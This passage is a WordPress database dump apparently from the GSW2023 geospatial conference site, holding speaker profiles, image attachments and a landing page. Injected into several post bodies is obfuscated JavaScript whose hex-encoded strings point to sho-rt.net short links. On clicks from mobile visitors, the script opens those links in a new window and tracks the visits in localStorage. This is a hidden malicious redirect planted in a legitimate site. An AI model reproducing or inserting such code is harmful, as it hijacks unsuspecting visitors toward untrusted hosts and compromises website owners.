_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Alfred Stein','','publish','closed','closed','','alfred-stein','','','2022-10-14 17:46:03','2022-10-14 17:46:03','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2849',0,'dt_team','',0),
(2850,1,'2022-10-14 17:44:51','2022-10-14 17:44:51','','w152','','inherit','open','closed','','w152','','','2022-10-14 17:44:51','2022-10-14 17:44:51','',2849,'https://gsw2023.com/wp-content/uploads/2022/10/w152.jpg',0,'attachment','image/jpeg',0),
(2851,1,'2022-10-14 17:45:45','2022-10-14 17:45:45','<!-- wp:paragraph -->\n<p>The Hong Kong Polytechnic</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>University,<br>Hong Kong, China (WG IV/2)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','John W.Z. Shi','','publish','closed','closed','','john-w-z-shi','','','2022-10-14 17:46:07','2022-10-14 17:46:07','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2851',0,'dt_team','',0),
(2852,1,'2022-10-14 17:45:29','2022-10-14 17:45:29','','w153','','inherit','open','closed','','w153','','','2022-10-14 17:45:29','2022-10-14 17:45:29','',2851,'https://gsw2023.com/wp-content/uploads/2022/10/w153.jpg',0,'attachment','image/jpeg',0),
(2853,1,'2022-10-14 21:31:21','2022-10-14 21:31:21','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 